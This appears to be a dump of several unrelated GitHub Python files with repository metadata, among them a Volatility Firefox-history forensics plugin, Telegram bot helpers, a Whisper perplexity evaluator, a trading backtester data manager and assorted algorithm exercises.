visit_count, hidden, typed, favicon_id, frecency, last_visit_date, guid, foreign_count in data:\n            if type(last_visit_date) is str:\n                end = 0\n            else:\n                end = sqlite_help.unix_time(last_visit_date)\n            history = url + \" -- \" + title\n            history = history.replace(\"|\", \"-\")\n            d = (0, \"[FIREFOXHISTORY] \" + history, 0, \"---------------\", 0, 0, 0, 0, end, 0, 0)\n            csv.writer(outfd,delimiter=\"|\",quoting=csv.QUOTE_NONE,escapechar=\"\\\\\").writerow(d)\n","repo_name":"volatilityfoundation/community","sub_path":"DaveLasalle/firefoxhistory.py","file_name":"firefoxhistory.py","file_ext":"py","file_size_in_byte":27780,"program_lang":"python","lang":"en","doc_type":"code","stars":331,"dataset":"github-code","pt":"37"} +{"seq_id":"11972359610","text":"import asyncio\nimport urllib.parse # quote_plus lives here, not in urllib.request\nimport requests\nfrom config import Config\n\nMAIN_URL = \"https://api.telegram.org/\"\nTOKEN = Config.BOT_TOKEN\n\ndef message(update,context,text = \"\"):\n    bot = context.bot\n    chat = update.effective_chat.id\n    msg = bot.send_message(chat,text,parse_mode='HTML')\n    return msg\n\ndef messageMarkdown(update,context, text= \"\"):\n    bot = context.bot\n    chat = update.effective_chat.id\n    msg = bot.send_message(chat,text,parse_mode='MarkdownV2')\n    return msg\n\ndef messageWithId(update,context,chat,text = \"\"):\n    bot = context.bot\n    msg = bot.send_message(chat,text,parse_mode='HTML')\n    return msg\n\ndef reply_message(update,context,text = \"\"):\n    msg = update.message.reply_text(text,parse_mode='HTML')\n    return msg\n\ndef PrivateMessage(update,context, text = \"\"):\n    bot = context.bot\n    msg = bot.send_message(update.message.from_user.id,text,parse_mode='HTML')\n    return msg\n\ndef messagePhoto(update, context, img, desc = ''):\n    bot = context.bot\n    photo = bot.sendPhoto(chat_id=update.effective_chat.id, photo=img, caption=desc, parse_mode='HTML')\n    return photo\n\ndef ApiMessage(text, chat_id):\n    text = urllib.parse.quote_plus(text)\n    url = MAIN_URL + \"bot{}/sendmessage?chat_id={}&text={}&parse_mode=HTML\".format(TOKEN, chat_id, text)\n    send = requests.get(url)\n    return send\n\nasync def messageWithAsync(update,context,delay,text = \"\"):\n    bot = context.bot\n    chat = update.effective_chat.id\n    await asyncio.sleep(delay)\n    msg = bot.send_message(chat,text,parse_mode='HTML')\n    return msg\n\n
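# Usage sketch (illustrative): these coroutines must run on an asyncio event loop,\n# e.g. awaited from within another coroutine:\n#     await messageWithAsync(update, context, 5, \"sent after 5 seconds\")\n# or scheduled on an already-running loop without awaiting:\n#     asyncio.create_task(messageWithAsync(update, context, 5, \"fire and forget\"))\n\nasync def 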
messageWithAsyncById(update,context,chat,delay,text = \"\"):\n bot = context.bot\n await asyncio.sleep(delay)\n msg = bot.send_message(chat,text,parse_mode='HTML')\n return msg","repo_name":"StormDev87/nebula8","sub_path":"core/utilities/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"4199381408","text":"import sqlite3\nDB_STUDENT = \"D:\\\\Project\\\\Radicali\\\\py_api_assignment\\\\.data\\\\EQUIPMENTS.db\"\n\ndef get_db():\n conn = sqlite3.connect(DB_STUDENT)\n return conn\n\n\ndef create_tables():\n tables = [\n \"\"\"CREATE TABLE IF NOT EXISTS EQUIPMENTS(\n ID INTEGER PRIMARY KEY AUTOINCREMENT,\n NAME TEXT NOT NULL,\n\t\t\t\tSTATUS TEXT NOT NULL,\n REQUEST TEXT\n )\n \"\"\"\n ]\n db = get_db()\n cursor = db.cursor()\n for table in tables:\n cursor.execute(table)\n\n","repo_name":"bakharia/py_api_assignment","sub_path":"create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72107085548","text":"import os, sys\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nfrom typing import Optional, List\nfrom functools import partial\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nimport pandas as pd\nfrom tqdm.auto import tqdm\n\nfrom transformers.models.whisper import (WhisperTokenizer,\n WhisperTokenizerFast,\n WhisperFeatureExtractor)\nfrom optimum.bettertransformer import BetterTransformer\n\nfrom dataloader.dataset_for_evaluation.base_dataset_group import BaseDatasetGroup\nfrom dataloader.collator import DataCollatorSpeechSeq2SeqWithPadding\nfrom dataloader.preprocessing_train.preprocessing import prepare_dataset_fct\nfrom models.whisper_zero_cross_attention import WhisperForConditionalGenerationZeroCrossAttention\nfrom utils.constants import DEFAULT_LABEL_TOKENIZED_COL, DEFAULT_EVAL_BATCH_SIZE, DEFAULT_NUM_PROC\n\n\ndef eval_whisper_implicit_lm_on_dataset_group(pretrained_model_name_or_path: str,\n ds_group: BaseDatasetGroup,\n batch_size: int = DEFAULT_EVAL_BATCH_SIZE, # only 1 is supported for now\n fast_tokenizer: bool = True,\n task: str=\"transcribe\",\n zero_shot: bool = False) -> pd.Series:\n \n if ds_group.is_multilingual:\n assert ds_group.language is None, \"Language must be `None` for multilingual datasets as it is inferred from the BaseDatasetGroup's metadata.\"\n \n if torch.cuda.is_available():\n device = \"cuda:0\"\n torch_dtype = torch.float16 # see https://huggingface.co/learn/audio-course/chapter5/evaluation?fw=pt\n elif torch.backends.mps.is_available(): # for Apple Silicon\n device = torch.device('mps')\n torch_dtype = torch.float32 # float16 not supported by MPS\n else:\n device = \"cpu\"\n torch_dtype = torch.float32\n\n # Load model:\n model = WhisperForConditionalGenerationZeroCrossAttention.from_pretrained(pretrained_model_name_or_path, torch_dtype=torch_dtype).to(device)\n \n if device == \"cuda:0\":\n model = BetterTransformer.transform(model)\n\n # Loop over the datasets:\n ppl_results = []\n tbar = tqdm(ds_group.items())\n \n for dataset_name, dataset in tbar:\n tbar.set_description(f\"Evaluating {dataset_name}...\")\n \n if not ds_group.is_multilingual:\n language = ds_group.language\n else:\n language = ds_group.ds_name_to_lang[dataset_name]\n \n if zero_shot:\n language = None\n task = None\n\n if fast_tokenizer:\n tokenizer = 
WhisperTokenizerFast.from_pretrained(pretrained_model_name_or_path, language=language, task=task)\n        else:\n            tokenizer = WhisperTokenizer.from_pretrained(pretrained_model_name_or_path, language=language, task=task)\n        \n        feature_extractor = WhisperFeatureExtractor.from_pretrained(pretrained_model_name_or_path)\n        \n        prepare_dataset = partial(prepare_dataset_fct,\n                                  tokenizer=tokenizer,\n                                  feature_extractor=feature_extractor)\n        dataset = dataset.map(prepare_dataset, num_proc=DEFAULT_NUM_PROC)\n\n        # Load data collator:\n        data_collator = DataCollatorSpeechSeq2SeqWithPadding(tokenizer=tokenizer,\n                                                             feature_extractor=feature_extractor,\n                                                             return_attention_mask=True)\n\n        dataloader = DataLoader(dataset, batch_size=batch_size, collate_fn=data_collator)\n\n        # Placeholders for per-batch perplexities:\n        ppl_per_batch: List[torch.Tensor] = []\n        \n        for batch in dataloader:\n            # Note that we need to move the data to the device manually (which is not the case with Trainer):\n            input_features = batch[\"input_features\"].to(device).to(torch_dtype)\n            attention_mask = batch[\"attention_mask\"].to(device)\n            tokenized_seq = batch[DEFAULT_LABEL_TOKENIZED_COL].to(device)\n\n            if not zero_shot:\n                tokenized_seq = concat_special_tokens(tokenized_seq,\n                                                      pretrained_model_name_or_path,\n                                                      language=language,\n                                                      task=task)\n                attention_mask_prefix = torch.Tensor([1, 1, 1, 1]).expand(attention_mask.shape[0], -1).to(attention_mask.device)\n                attention_mask = torch.cat([attention_mask_prefix, attention_mask[:, 2:]], dim=1)\n\n            # Shift inputs for next-word prediction:\n            decoder_input_ids = tokenized_seq[:, 1:] # [w1, w2, ..., wN, EOT]\n            decoder_input_ids_right_shifted = tokenized_seq[:, :-1] # [SOT, w1, w2, ..., wN]\n            attention_mask_right_shifted = attention_mask[:, :-1]\n\n            # One-step generation:\n            with torch.no_grad():\n                output = model.forward(input_features=input_features,\n                                       decoder_input_ids=decoder_input_ids_right_shifted,\n                                       attention_mask=attention_mask_right_shifted)\n            \n            # Convert logits to log-probabilities:\n            log_prob_all = torch.nn.functional.log_softmax(output.logits, dim=-1) # (batch_size, seq_len, vocab_size)\n\n            # Take probabilities for the ground-truth tokens:\n            log_prob_tokens = log_prob_all.take_along_dim(decoder_input_ids[..., None], dim=-1).squeeze(dim=-1) # (batch_size, seq_len)\n\n            # FIXME: The current implementation is not quite correct: EOT is discarded only for the longest sequence in the batch.\n            # For the other sequences, the prediction for the EOT token is taken into account in the perplexity computation.\n            # We hypothesize that this is negligible, as a well-trained model should predict that EOT follows EOT with very high probability.\n            \n            # All the values associated with the pad tokens are set to 0 so that they are ignored in the sum.\n            log_prob_seq = log_prob_tokens.masked_fill(attention_mask_right_shifted.eq(0), 0).sum(dim=-1) # (batch_size,)\n            mean_log_prob_seq = log_prob_seq / attention_mask_right_shifted.sum(dim=-1) # (batch_size,)\n            \n            # Compute perplexity:\n            perplexity = torch.exp(-mean_log_prob_seq) # (batch_size,)\n            \n            # Add to the list of perplexities:\n            ppl_per_batch.append(perplexity)\n        \n        # Aggregate the per-sequence perplexities into one value for this dataset:\n        ppl_current_dataset = torch.cat(ppl_per_batch, dim=0).mean().item()\n        ppl_results.append(ppl_current_dataset)\n    \n    # Save the results:\n    results = pd.Series(ppl_results, index=list(ds_group.keys()), name=\"Perplexity\")\n    results.index.name = \"Dataset\"\n    \n    # Compute the average perplexity:\n    results[\"Average\"] = results.mean()\n    \n    # Round the results:\n    results = results.round(2)\n    \n    return results\n\n\n
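# Illustrative sketch: the per-sequence perplexity above reduces to\n# exp(-mean token log-probability). `log_probs` is a hypothetical 1-D tensor of\n# per-token log-probabilities for a single sequence (not part of the pipeline above).\ndef _perplexity_from_log_probs(log_probs: torch.Tensor) -> torch.Tensor:\n    # PPL = exp(-(1/N) * sum_i log p_i); .mean() supplies the (1/N) * sum term\n    return torch.exp(-log_probs.mean())\n\n\n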
def concat_special_tokens(x: torch.Tensor,\n                          pretrained_model_name_or_path: str,\n                          language: Optional[str] = None,\n                          task: Optional[str] = None) -> torch.Tensor:\n    \"\"\"\n    Concatenate the language and task special tokens to the tokenized labels (batched).\n    Important: We assumed that all token sequences begin with `<|startoftranscript|>`, `<|notimestamps|>`.\n    \"\"\"\n    tokenizer = WhisperTokenizer.from_pretrained(pretrained_model_name_or_path, language=language, task=task)\n    special_tokens = torch.LongTensor([tokenizer(\"\").input_ids[:4]]).expand(x.shape[0], -1).to(x.device)\n    x = torch.cat([special_tokens, x[:, 2:]], dim=1)\n    return x\n","repo_name":"tonywu71/distilling-and-forgetting-in-large-pre-trained-models","sub_path":"evaluation/eval_whisper_implicit_lm_on_dataset.py","file_name":"eval_whisper_implicit_lm_on_dataset.py","file_ext":"py","file_size_in_byte":7992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22525972047","text":"class Solution:\n    def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n        if len(s1) + len(s2) != len(s3):\n            return False\n\n        # dp[i][j]: True if s3[:i+j] is an interleaving of s1[:i] and s2[:j]\n        dp = [[False] * (len(s2) + 1) for _ in range(len(s1) + 1)]\n        dp[0][0] = True\n\n        for i in range(len(s1) + 1):\n            for j in range(len(s2) + 1):\n                # extend a valid shorter prefix with the next char of s1...\n                if i > 0 and s1[i - 1] == s3[i + j - 1] and dp[i - 1][j]:\n                    dp[i][j] = True\n                # ...or with the next char of s2\n                if j > 0 and s2[j - 1] == s3[i + j - 1] and dp[i][j - 1]:\n                    dp[i][j] = True\n\n        return dp[-1][-1]\n    \n    
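# Worked example (illustrative): s1=\"aa\", s2=\"ab\", s3=\"abaa\" (test9 below).\n    # dp[0][0] -> dp[0][1] (take 'a' from s2) -> dp[0][2] (take 'b' from s2)\n    # -> dp[1][2] (take 'a' from s1) -> dp[2][2] (take 'a' from s1),\n    # so the answer is True: \"abaa\" = a(s2) b(s2) a(s1) a(s1).\n    \n    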
def test1(self):\n        s1 = \"aabcc\"\n        s2 = \"dbbca\"\n        s3 = \"aadbbcbcac\"\n        res = self.isInterleave(s1, s2, s3)\n        # expected True\n        print(\"res: \", res)\n    \n    def test2(self):\n        s1 = \"aabcc\"\n        s2 = \"dbbca\"\n        s3 = \"aadbbbaccc\"\n        res = self.isInterleave(s1, s2, s3)\n        # expected False\n        print(\"res: \", res)\n    \n    def test3(self):\n        s1 = \"\"\n        s2 = \"\"\n        s3 = \"\"\n        res = self.isInterleave(s1, s2, s3)\n        # expected True\n        print(\"res: \", res)\n\n    def test4(self):\n        s1 = \"\"\n        s2 = \"\"\n        s3 = \"a\"\n        res = self.isInterleave(s1, s2, s3)\n        # expected False\n        print(\"res: \", res)\n    \n    def test5(self):\n        s1 = \"\"\n        s2 = \"a\"\n        s3 = \"a\"\n        res = self.isInterleave(s1, s2, s3)\n        # expected True\n        print(\"res: \", res)\n\n    def test6(self):\n        s1 = \"a\"\n        s2 = \"\"\n        s3 = \"c\"\n        res = self.isInterleave(s1, s2, s3)\n        # expected False\n        print(\"res: \", res)\n\n    def test7(self):\n        s1 = \"a\"\n        s2 = \"b\"\n        s3 = \"a\"\n        res = self.isInterleave(s1, s2, s3)\n        # expected False\n        print(\"res: \", res)\n    \n    def test8(self):\n        s1 = \"db\"\n        s2 = \"b\"\n        s3 = \"cbb\"\n        res = self.isInterleave(s1, s2, s3)\n        # expected False\n        print(\"res: \", res)\n    \n    def test9(self):\n        s1 = \"aa\"\n        s2 = \"ab\"\n        s3 = \"abaa\"\n        res = self.isInterleave(s1, s2, s3)\n        # expected True\n        print(\"res: \", res)\n\ns = Solution()\n# s.test1()\n# s.test2()\n# s.test3()\n# s.test4()\n# s.test5()\n# s.test6()\n# s.test7()\n# s.test8()\ns.test9()","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/leetcode/lc97_interleaving_string.py","file_name":"lc97_interleaving_string.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"38344274949","text":"import matplotlib.pyplot as plt\nimport numpy as np \nimport os\nimport random\nimport string\nimport subprocess\nimport sys\nimport time\n\n# Hardcoding location of source code to use within this repository\nSRC_CODE_DIR_PATH = \"../C/\"\nEXEC_NAME = \"CryptoTestC\"\n\n# Function to generate a random ascii string of a given length\ndef GenRandString(length):\n    new_str = \"\".join([random.choice(string.ascii_letters + string.digits) for x in range(length)])\n    return new_str\n\n# Function to calculate hamming weight of a passed in string\ndef GetStrHammingWeight(string):\n    weight = 0\n    for char in string:\n        num_char = ord(char)\n        while num_char != 0:\n            if num_char & 1:\n                weight += 1\n            num_char = num_char >> 1\n    return weight\n\n# Simple function to generate a plot showing the duration\n# of Sha256 runs for randomly generated ascii string inputs.\n# Plot: x-axis = hamming weights, y-axis = raw time.time duration\ndef Sha256HammingWeightDurationTest():\n    cmd = SRC_CODE_DIR_PATH + EXEC_NAME\n    str_length = 10000\n    num_data_points = 20000\n    h_weights = []\n    times = []\n\n    if os.path.exists(cmd) == False:\n        print(\"compiling...\")\n        output = subprocess.check_output([\"make\", \"-C\", SRC_CODE_DIR_PATH])\n\n    for i in range(0, num_data_points):\n        if (i % 100) == 0:\n            print(\"Iteration %d\" % (i))\n\n        test_str = GenRandString(str_length)\n        test_weight = GetStrHammingWeight(test_str)\n        h_weights.append(test_weight)\n        start_time = time.time()\n        output = subprocess.check_output([cmd, \"-g\", test_str])\n        end_time = time.time()\n        times.append((end_time - start_time))\n    \n    plt.scatter(h_weights, times, color=\"red\")\n    plt.show()\n\n# Main\nif __name__ == \"__main__\":\n    Sha256HammingWeightDurationTest()\n","repo_name":"ErikAlsterlind/Crypto","sub_path":"Python/PerformanceTestSha256.py","file_name":"PerformanceTestSha256.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29851242861","text":"from datetime import date, timedelta\nfrom dateutil.parser import parse\nfrom hashlib import sha256\nimport logging\nfrom os.path import join, isfile\nfrom os import makedirs\nfrom sys import stdout\nfrom typing import List, Dict\n\nimport pandas as pd\n\nfrom data.util import get_data_folder, load_adjusted_price, \\\n    load_fundamental_dataframe, load_benchmark\nfrom data.config import FUNDAMENTAL_PUBLISH_DELAY\nfrom core.util import get_logger\n\n\nclass DataManager:\n\n    def create_price_dataframe(self, start_date: date, end_date: date, \\\n        universe: List[str], strategy):\n\n        run_id = ' '.join([start_date.isoformat(), end_date.isoformat(), \n            ''.join(universe)])\n        
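# NB: the cache key is a digest of the whole run signature, so changing the\n        # dates or the universe yields a new cache file. One caveat, left as found:\n        # ''.join(universe) is ambiguous across ticker boundaries (e.g. ['AB', 'C']\n        # and ['A', 'BC'] collide); joining with a separator would make the key unique.\n        file_key = 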
sha256(run_id.encode()).hexdigest()\n        file_path = join(get_data_folder()['price'], file_key + '.csv')\n        \n        if isfile(file_path):\n            self.logger.info('found existing cached price data')\n            return pd.read_csv(file_path, index_col='date', parse_dates=['date'])\n\n        dataframe = None\n        for idx, ticker in enumerate(universe):\n            df = load_adjusted_price(fsym_id=ticker, start_date=start_date,\n                end_date=end_date, adjustment_method='f')\n\n            stdout.write('\\rloaded [%d / %d] prices' % (idx + 1, len(universe)))\n            stdout.flush()\n\n            if idx == 0:\n                dataframe = df\n                continue\n            dataframe = dataframe.join(df, how='outer')\n        \n        dataframe = dataframe.round(decimals=2)\n        dataframe.index = pd.to_datetime(dataframe.index)\n        dataframe.sort_index(inplace=True)\n        dataframe.fillna(inplace=True, method='pad')\n        dataframe.to_csv(file_path)\n        return dataframe\n\n\n    def create_fundamental_dataframe(self, start_date: date, \n        end_date: date, universe: List[str], strategy):\n        \n        required_fields = sorted(strategy.required_fields())\n        # return empty dataframe if this is a pure price based strategy\n        if len(required_fields) == 0:\n            return pd.DataFrame() \n\n        run_id = ' '.join([start_date.isoformat(), end_date.isoformat(), \n            ''.join(universe), ','.join(sorted(required_fields))])\n        file_key = sha256(run_id.encode()).hexdigest()\n        file_path = join(get_data_folder()['fundamental'], file_key + '.csv')\n\n        if isfile(file_path):\n            self.logger.info('found existing cached fundamental data')\n            return pd.read_csv(file_path, parse_dates=True, \n                index_col=['date', 'fsym_id'])\n\n        dataframe = load_fundamental_dataframe(fsym_ids=universe, \n            period='q', factset_fields=required_fields)\n        dataframe.to_csv(file_path)\n        return dataframe\n\n\n    def __init__(self, logger=None, *args, **kwargs):\n        self.DATAFRAMES = {}\n        self.current_row_index = None\n        self.logger = logger or get_logger('DataManager', logging.WARNING)\n    \n\n    def setup(self, start_date: date, end_date: date, \n        universe: List[str], strategy) -> None:\n        \n        self.DATAFRAMES['price'] = self.create_price_dataframe(\n            start_date=start_date, end_date=end_date, \n            universe=universe, strategy=strategy)\n        self.DATAFRAMES['fundamental'] = self.create_fundamental_dataframe(\n            start_date=start_date, end_date=end_date, \n            universe=universe, strategy=strategy)\n        if strategy.benchmark is None:\n            self.DATAFRAMES['benchmark'] = None\n        else: \n            benchmark_dataframe = load_benchmark(strategy.benchmark)\n            benchmark_dataframe = benchmark_dataframe.loc[start_date: end_date, :]\n            self.DATAFRAMES['benchmark'] = benchmark_dataframe\n\n\n    def get_market_data(self, as_of_date: date) -> Dict:\n        data = {}\n        for db_type, dataframe in self.DATAFRAMES.items():\n            if db_type == 'price':\n                price_dataframe = dataframe[dataframe.index <= as_of_date]\n                # in case some stocks are listed after the as_of_date, \n                # their prices will all be NaN; we filter them out\n                # to avoid look-ahead bias\n                listed_tickers = price_dataframe.notna().any()\n                data[db_type] = price_dataframe.loc[:, listed_tickers]\n            elif db_type == 'fundamental':\n                # due to the lag between fiscal period end and the\n                # actual publish date of fundamental data, we add a \n                # conservative lag here to avoid look-ahead bias\n                visible_date = as_of_date - timedelta(days=FUNDAMENTAL_PUBLISH_DELAY)\n                data[db_type] = dataframe.loc[pd.IndexSlice[:visible_date,:]]\n        return data\n    \n\n    def get_prices_for_date(self, as_of_date: date) -> pd.Series:\n        price = self.DATAFRAMES['price']\n        return price[price.index <= as_of_date].iloc[-1, :].squeeze()\n    \n    \n    def 
get_ticker_price_for_date(self, ticker: str, as_of_date: date) -> float:\n        return self.DATAFRAMES['price'][ticker].loc[as_of_date]","repo_name":"fricative/backtester","sub_path":"backtester/data/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2823688441","text":"# Bubble sort technique to sort a singly linked list.\nprint()\n\nclass Node():\n    def __init__(self,data):\n        self.data=data\n        self.next=None\n    \nclass Linked_list():\n    def __init__(self):\n        self.start=None\n        self.count=0   # number of nodes; starts at zero for an empty list\n    \n    def Insert_Node(self,data):\n        temp=Node(data)\n        if self.start==None:\n            self.start=temp\n        else:\n            ptr=self.start\n            while ptr.next!=None:\n                ptr=ptr.next\n            ptr.next=temp\n        self.count+=1\n    \n    def Bubble_Sort(self):\n        if self.start==None:\n            print('\\nLinked List is Empty')\n        else:\n            curr=self.start\n            index=None\n            temp=None\n            while curr!=None:\n                index=curr.next\n                while index!=None:\n                    if curr.data>index.data:\n                        temp=curr.data\n                        curr.data=index.data\n                        index.data=temp\n                    index=index.next\n                curr=curr.next\n\n    def Display(self):\n        if self.start==None:\n            print('\\nLinked List is Empty')\n        else:\n            x=self.start\n            while x!=None:\n                print(x.data,end='->')\n                x=x.next\n    \n\nif __name__ == \"__main__\":\n    LL=Linked_list()\n    print()\n    while True:\n        print('\\n============')\n        print('1: Insert Node')\n        print('2: Sort Linked List')\n        print('3: Display')\n        print('4: Exit')\n        ch=int(input(\"Enter Your Choice: \"))\n\n        if ch==1:\n            item=int(input(\"Enter the Element: \"))\n            LL.Insert_Node(item)\n        elif ch==2:\n            LL.Bubble_Sort()\n        elif ch==3:\n            LL.Display()\n        elif ch==4:\n            quit()\n        else:\n            print('\\nInvalid Choice')","repo_name":"puneet4840/Data-Structure-and-Algorithms","sub_path":"Linked List in Python/1 - Singly Linked List/15 - Sorting Singly Linked List.py","file_name":"15 - Sorting Singly Linked List.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71047332268","text":"\nimport logging\nfrom logging import CRITICAL, ERROR, WARNING, INFO, DEBUG\n\nfrom py.utility import color\n\nlevel_colors = {\n    CRITICAL : color.magenta,\n    ERROR : color.red,\n    WARNING : color.yellow,\n    INFO : color.green,\n    DEBUG : color.white,\n}\n\nlevel_names = {\n    CRITICAL : \"CRITI\",\n    ERROR : \"ERROR\",\n    WARNING : \"WARN\",\n    INFO : \"INFO\",\n    DEBUG : \"DEBUG\",\n}\n\ndef levelname(level):\n    return level_colors.get(level, color)(level_names.get(level, \"NOTSET\"))\n\nCRITICAL_NAME = levelname(CRITICAL)\nERROR_NAME = levelname(ERROR)\nWARNING_NAME = levelname(WARNING)\nINFO_NAME = levelname(INFO)\nDEBUG_NAME = levelname(DEBUG)\n\nclass LogRecord(logging.LogRecord):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.msecs_int = int(self.msecs)\n        self.levelname = level_colors.get(self.levelno, color)(f\"{level_names.get(self.levelno, ''):>5}\")\n\ndef config(filter_names):\n    handlers = []\n    for filter_name in filter_names:\n        handler = logging.StreamHandler()\n        handler.addFilter(logging.Filter(filter_name))\n        handlers.append(handler)\n\n    logging.basicConfig(\n        format=\"[{asctime}.{msecs_int:03}][{levelname}][{name}][{filename:16.16}{lineno:>4}]: {msg}\",\n        datefmt=\"%Y-%m-%d %H:%M:%S\",\n        style=\"{\",\n        handlers=handlers)\n    logging.setLogRecordFactory(LogRecord)\n\ndef get(name):\n    return logging.getLogger(name)\n\ndef main():\n    logger = get(__name__)\n    
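# smoke test: call config([...]) first (e.g. config([__name__])) so this record goes through the colourised LogRecord factory\n    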
logger.info(\"help2\")","repo_name":"centixkadon/tools","sub_path":"py/utility/loggers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37447977773","text":"\"\"\"\n#https://leetcode.com/problems/two-city-scheduling/\n\n\nThere are 2N people a company is planning to interview. The cost of flying the i-th person to city A is costs[i][0],\n and the cost of flying the i-th person to city B is costs[i][1].\n\nReturn the minimum cost to fly every person to a city such that exactly N people arrive in each city.\n\"\"\"\n\nclass Solution:\n def twoCitySchedCost(self, costs: List[List[int]]) -> int:\n ans = 0\n for i in costs:\n q = abs(i[0] - i[1])\n i.append(q)\n\n cos = sorted(costs, key=lambda x: x[2], reverse=True)\n print(cos)\n\n ta1 = 0\n ta2 = 0\n\n z = 0\n z1 = len(cos) // 2\n while (z < len(cos)):\n if cos[z][0] > cos[z][1]:\n if ta2 < z1:\n ans = ans + cos[z][1]\n ta2 += 1\n else:\n ans = ans + cos[z][0]\n ta1 += 1\n else:\n if ta1 < z1:\n ans = ans + cos[z][0]\n ta1 += 1\n else:\n ans = ans + cos[z][1]\n ta2 += 1\n z += 1\n\n return ans\n\n\n","repo_name":"SurajPatil314/Leetcode-problems","sub_path":"greedy_2cityscheduling.py","file_name":"greedy_2cityscheduling.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20988838956","text":"import numpy as np\n\n\ndef minEditDistance(sourceString, targetString):\n rows = len(sourceString) + 1\n cols = len(targetString) + 1\n dist = np.zeros((rows + 1, cols + 1))\n for i in range(1, rows):\n dist[i][0] = i\n for i in range(1, cols):\n dist[0][i] = i\n\n for col in range(1, cols):\n for row in range(1, rows):\n if sourceString[row - 1] == targetString[col - 1]:\n cost = 0\n else:\n cost = 2\n dist[row][col] = min(dist[row - 1][col] + 1, # deletion\n dist[row][col - 1] + 1, # insertion\n dist[row - 1][col - 1] + cost) # substitution\n\n return dist[row][col]\n\n\ndef run():\n sourceString = input('Enter source string: ')\n targetString = input('Enter target string: ')\n med = minEditDistance(str(sourceString), str(targetString))\n print('The min edit distance between \"' + str(sourceString) + '\" and \"' + str(targetString) + '\" is ' + str(med))\n\nrun()\n","repo_name":"OlukoyaDaniel/NLP-18-OlukoyaDaniel","sub_path":"lab2/editDistance.py","file_name":"editDistance.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72700710507","text":"from searching_framework.utils import Problem\nfrom searching_framework.uninformed_search import *\n\n\n\nclass Search(Problem):\n def __init__(self, initial,goal=None):\n super().__init__(initial,goal)\n self.goal_size = [6,4]\n\n\n def successor(self, state):\n\n successors = dict()\n\n pacman_x = state[0]\n pacman_y = state[1]\n obstacle1 = [state[2],state[3],state[4]]\n obstacle2 = [state[5],state[6],state[7]]\n\n\n #Dvizejne na preckite\n\n if obstacle1[2] == 1: #desno\n if obstacle1[0] == 6:\n obstacle1[2] = 0\n obstacle1[0] -= 1\n else:\n obstacle1[0] += 1\n else: #levo\n if obstacle1[0] == 0:\n obstacle1[2] = 1\n obstacle1[0] += 1\n else:\n obstacle1[0] -= 1\n\n if obstacle2[2] == 1: #gore\n if obstacle2[1] == 5:\n obstacle2[2] = 0\n obstacle2[1] -= 1\n else:\n obstacle2[1] += 1\n else: #dolu\n if obstacle2[1] == 0:\n obstacle2[2] = 1\n obstacle2[1] += 1\n 
else:\n                obstacle2[1] -= 1\n\n        obstacles = [[obstacle1[0],obstacle1[1]],[obstacle2[0],obstacle2[1]]]\n\n        if 0 <= pacman_x+1 < 7 and [pacman_x + 1, pacman_y] not in obstacles: # move right\n            successors['Desno'] = (pacman_x + 1, pacman_y, obstacle1[0], obstacle1[1], obstacle1[2],\n                                   obstacle2[0], obstacle2[1], obstacle2[2])\n\n        if 0 <= pacman_x-1 < 7 and [pacman_x - 1, pacman_y] not in obstacles: # move left\n            successors['Levo'] = (pacman_x - 1, pacman_y, obstacle1[0], obstacle1[1], obstacle1[2],\n                                  obstacle2[0], obstacle2[1], obstacle2[2])\n\n        if 0 <= pacman_y + 1 < 7 and [pacman_x , pacman_y + 1] not in obstacles: # move up\n            successors['Gore'] = (pacman_x,pacman_y + 1,obstacle1[0],obstacle1[1],obstacle1[2],\n                                  obstacle2[0],obstacle2[1],obstacle2[2])\n\n        if 0 <= pacman_y - 1 < 7 and [pacman_x , pacman_y - 1] not in obstacles: # move down\n            successors['Dolu'] = (pacman_x,pacman_y - 1,obstacle1[0],obstacle1[1],obstacle1[2],\n                                  obstacle2[0],obstacle2[1],obstacle2[2])\n\n\n\n        return successors\n\n    def actions(self, state):\n\n        return self.successor(state).keys()\n\n    def result(self, state, action):\n\n        return self.successor(state)[action]\n\n\n    def goal_test(self, state):\n\n        position = (state[0],state[1])\n\n        return position == self.goal\n\nif __name__ == '__main__':\n    goal_state = (6,4)\n    initial_state = (0,0)\n\n    obstacle_1 = (2, 2, 0)   # moves left - right\n    obstacle_2 = (4, 5, 0)   # moves up - down\n\n    exp = Search((initial_state[0],initial_state[1],\n                  obstacle_1[0],obstacle_1[1],obstacle_1[2],\n                  obstacle_2[0],obstacle_2[1],obstacle_2[2]),goal_state)\n\n    result = breadth_first_graph_search(exp)\n    print(result.solution())\n    print(result.solve())","repo_name":"tosek4/Vestacka_Intelegencija","sub_path":"Ex.2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17926664012","text":"import os\n\ndef main():\n    commands = [[command[0], int(command[1])] for command in [line.split() for line 